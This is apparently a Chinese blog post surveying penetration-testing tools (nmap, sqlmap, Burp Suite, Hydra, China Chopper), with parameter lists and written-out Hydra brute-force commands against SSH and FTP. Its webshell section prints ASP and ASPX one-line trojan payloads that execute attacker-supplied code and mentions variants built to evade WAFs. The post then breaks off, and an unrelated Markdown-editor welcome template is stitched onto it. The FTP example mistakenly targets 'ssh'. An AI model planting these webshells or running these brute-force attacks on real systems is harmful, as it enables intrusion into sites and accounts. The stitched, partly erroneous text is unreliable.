渗透测试工具

渗透测试工具

一、十个渗透工具

1. nmap
2. sqlmap
3. Burpsuite
4. hydra
5. 中国菜刀
6. 中国蚁剑
7. 御剑
8. Nessus
9. AWVS
10. Appscan
    二、介绍与使用
11. nmape主要用来 主机发现、 端口扫描、 版本侦测、 操作系统侦测
12. 一些常用的参数 ：
    -A ：选项用于使用进攻性方式扫描
    -T4： 指定扫描过程使用的时序，总有6个级别（0-5）级别越高，扫描速度越快，但也容易被 防火墙或IDS检测并屏蔽掉，在网络通讯状况较好的情况下推荐使用T4
    -oX test.xml： 将扫描结果生成 test.xml 文件
    -oG test.txt: 将扫描结果生成 test.txt 文件
    -sn : 只进行主机发现，不进行端口扫描
    -O : 指定Nmap进行系统版本扫描
    -sV: 指定让Nmap进行服务版本扫描
    -p : 扫描指定的端口
    -sS/sT/sA/sW/sM:指定使用 TCP SYN/Connect()/ACK/Window/Maimon scans的方式来对目标主机进行扫描
    -sU: 指定使用UDP扫描方式确定目标主机的UDP端口状况
13. 1. Nmap 域名2. Nmap IP
       1. Nmap 192.168.1.1/24
          //表示当前ip下的24位掩码主机都要扫描，从192.168.1.1到192.168.1.254
       2. Namp 192.168.1.*
          //可以用*通配符代表范围内的所有主机
          扫描多个目标：Nmap IP1 IP2 … //中间用空格分隔
          扫描一个范围内的目标：nmap 192.168.1.1-100　 //表示扫描192.168.1.1开始的100台主机
          扫描特定主机上的某些端口：
          nmap -p21,22,23,80,443 192.168.1.1 //扫描指定端口
          nmap –p20-80 192.168.1.1 //扫描指定范围内的端口

2.1.sqlmap:是一个开源的渗透测试工具，可以用来进行自动化检测，利用SQL注入漏洞，获取数据 库服务器的权限.
2.2.参数:-p 指定测试参数
-b 获取banner
–dbs 列举数据库
–is-dba 是否是管理员权限
–current-db 当前数据库
–current-user 当前用户
–tables 列举数据库
–count 检索所有条目数
–columns 获取表的列名
–dump 获取表中的数据，包含列
–dump-all 转存DBMS数据库所有表项目
–level 测试等级(1-5)，默认为1
-v 显示详细信息的表名
2.3 操作步骤
读取数据库 —> 读取表 ----> 读取表的列 ----> 获取内容
-D 指定数据库 -T 指定表 -C 指定列--dbms=mysql oracle mssql 指定数据库
https://blog.csdn.net/qq_41870552/article/details/83997028
3. BurpSuite 是用于攻击web 应用程序的集成平台，包含了许多工具
Burpsuite默认使用8080端口作为代理，当然，你也可以自己修改端口号。
Proxy——>Options，然后下面可以自己修改代理的端口号，默认是8080
这里 Proxy 的 Intercept 这里显示 Intercept is on 表示拦截包开启，所有代理的包都必须先经过burpsuite放行才可以走。
3.2Intruder模块(爆破)
1：Target 用于配置目标服务器进行攻击的详细信息。

2：Positions 设置Payloads的插入点以及攻击类型（攻击模式）。

3：Payloads 设置payload，配置字典

4：Options 此选项卡包含了request headers，request engine， attack results ，grep match，grep_extrack，grep payloads和redirections。
你可以发动攻击之前，在主要Intruder的UI上编辑这些选项，大部分设置也可以在攻击时对已在运行的窗口进行修改
4. Hydra是一款非常强大的暴力破解工具，它是由著名的黑客组织THC开发的一款开源暴力破解工具.
参数
R：继续从上一次进度接着破解
-S：大写，采用SSL链接
-s ：小写，可通过这个参数指定非默认端口
-l ：指定破解的用户，对特定用户破解
-L ：指定用户名字典
-p ：小写，指定密码破解，少用，一般是采用密码字典
-P ：大写-，指定密码字典
-e ：可选，n:空密码试探，s:使用指定用户和密码试探
-C ：使用冒号分割格式，例如“登录名:密码”来
代替 -L/-P 参数
破解SSH：hydra -L user.txt -P passwd.txt -o ssh.txt -vV -t 5 target_IP ssh
-L指定用户字典 -P 指定密码字典 -o把成功的输出到ssh.txt文件 -vV显示详细信息
破解FTP:
hydra -L user.txt -P passwd.txt -o ftp.txt -vV -t 5 target_IP ssh
-L指定用户名列表 -P指定密码字典 -o把爆破的输出到文件 -t指定线程 -vV 显示详细信息
5. 中国菜刀
往目标网站中加入一句话木马，然后你就可以在本地通过中国菜刀chopper.exe即可获取和控制整个网站目录
一句话木马就是只需要一行代码的木马，短短一行代码，就能做到和大马相当的功能。为了绕过waf的检测，一句话木马出现了无数中变形，但本质是不变的：木马的函数执行了我们发送的命令。
例如：
简单的一句话木马：
PHP：

Asp：
<%eval request (“pass”)%>
Aspx：
<%@ Page Language=“Jscript”%><%eval(Request.Item[“pass”],“unsafe”);%>

欢迎使用Markdown编辑器

你好！ 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可以仔细阅读这篇文章，了解一下Markdown的基本语法知识。

新的改变

我们对Markdown编辑器进行了一些功能拓展与语法支持，除了标准的Markdown编辑器功能，我们增加了如下几点新功能，帮助你用它写博客：

1. 全新的界面设计 ，将会带来全新的写作体验；
2. 在创作中心设置你喜爱的代码高亮样式，Markdown 将代码片显示选择的高亮样式 进行展示；
3. 增加了 图片拖拽 功能，你可以将本地的图片直接拖拽到编辑区域直接展示；
4. 全新的 KaTeX数学公式 语法；
5. 增加了支持甘特图的mermaid语法¹ 功能；
6. 增加了 多屏幕编辑 Markdown文章功能；
7. 增加了 焦点写作模式、预览模式、简洁写作模式、左右区域同步滚轮设置 等功能，功能按钮位于编辑区域与预览区域中间；
8. 增加了 检查列表 功能。

功能快捷键

撤销：Ctrl/Command + Z
重做：Ctrl/Command + Y
加粗：Ctrl/Command + B
斜体：Ctrl/Command + I
标题：Ctrl/Command + Shift + H
无序列表：Ctrl/Command + Shift + U
有序列表：Ctrl/Command + Shift + O
检查列表：Ctrl/Command + Shift + C
插入代码：Ctrl/Command + Shift + K
插入链接：Ctrl/Command + Shift + L
插入图片：Ctrl/Command + Shift + G

合理的创建标题，有助于目录的生成

直接输入1次#，并按下space后，将生成1级标题。
输入2次#，并按下space后，将生成2级标题。
以此类推，我们支持6级标题。有助于使用TOC语法后生成一个完美的目录。

如何改变文本的样式

强调文本 强调文本

加粗文本 加粗文本

标记文本

删除文本

引用文本

H₂O is是液体。

2¹⁰ 运算结果是 1024.

插入链接与图片

链接: link.

图片:

带尺寸的图片:

居中的图片:

居中并且带尺寸的图片:

当然，我们为了让用户更加便捷，我们增加了图片拖拽功能。

如何插入一段漂亮的代码片

去博客设置页面，选择一款你喜欢的代码片高亮样式，下面展示同样高亮的 代码片.

// An highlighted block
var foo = 'bar';

生成一个适合你的列表

• 项目
  • 项目
    • 项目

1. 项目1
2. 项目2
3. 项目3

• 计划任务
• 完成任务

创建一个表格

一个简单的表格是这么创建的：

项目	Value
电脑	$1600
手机	$12
导管	$1

设定内容居中、居左、居右

使用:---------:居中
使用:----------居左
使用----------:居右

第一列	第二列	第三列
第一列文本居中	第二列文本居右	第三列文本居左

SmartyPants

SmartyPants将ASCII标点字符转换为“智能”印刷标点HTML实体。例如：

TYPE	ASCII	HTML
Single backticks	'Isn't this fun?'	‘Isn’t this fun?’
Quotes	"Isn't this fun?"	“Isn’t this fun?”
Dashes	-- is en-dash, --- is em-dash	– is en-dash, — is em-dash

创建一个自定义列表

Markdown

Text-to- HTML conversion tool

Authors

John

Luke

如何创建一个注脚

一个具有注脚的文本。²

注释也是必不可少的

Markdown将文本转换为 HTML。

KaTeX数学公式

您可以使用渲染LaTeX数学表达式 KaTeX:

Gamma公式展示 $\Gamma (n)=(n-1)!\forall n\in \mathbb{N}$ 是通过欧拉积分

$$\Gamma (z)={\int }_0^{\infty }{t}^{z-1}{e}^{-t}dt.$$

你可以找到更多关于的信息 LaTeX 数学表达式here.

新的甘特图功能，丰富你的文章

Mon 06 Mon 13 Mon 20 已完成 进行中 计划一 计划二 现有任务 Adding GANTT diagram functionality to mermaid

• 关于 甘特图 语法，参考 这儿,

UML 图表

可以使用UML图表进行渲染。 Mermaid. 例如下面产生的一个序列图：:

张三 李四 王五 你好！李四, 最近怎么样? 你最近怎么样，王五？ 我很好，谢谢! 我很好，谢谢! 李四想了很长时间, 文字太长了 不适合放在一行. 打量着王五... 很好... 王五, 你怎么样? 张三 李四 王五

这将产生一个流程图。:

链接

长方形

圆

圆角长方形

菱形

• 关于 Mermaid 语法，参考 这儿,

FLowchart流程图

我们依旧会支持flowchart的流程图：

Created with Raphaël 2.2.0 开始 我的操作 确认？ 结束 yes no

• 关于 Flowchart流程图 语法，参考 这儿.

导出与导入

导出

如果你想尝试使用此编辑器, 你可以在此篇文章任意编辑。当你完成了一篇文章的写作, 在上方工具栏找到 文章导出 ，生成一个.md文件或者.html文件进行本地保存。

导入

如果你想加载一篇你写过的.md文件，在上方工具栏可以选择导入功能进行对应扩展名的文件导入，
继续你的创作。

---

1. mermaid语法说明 ↩︎

2. 注脚的解释 ↩︎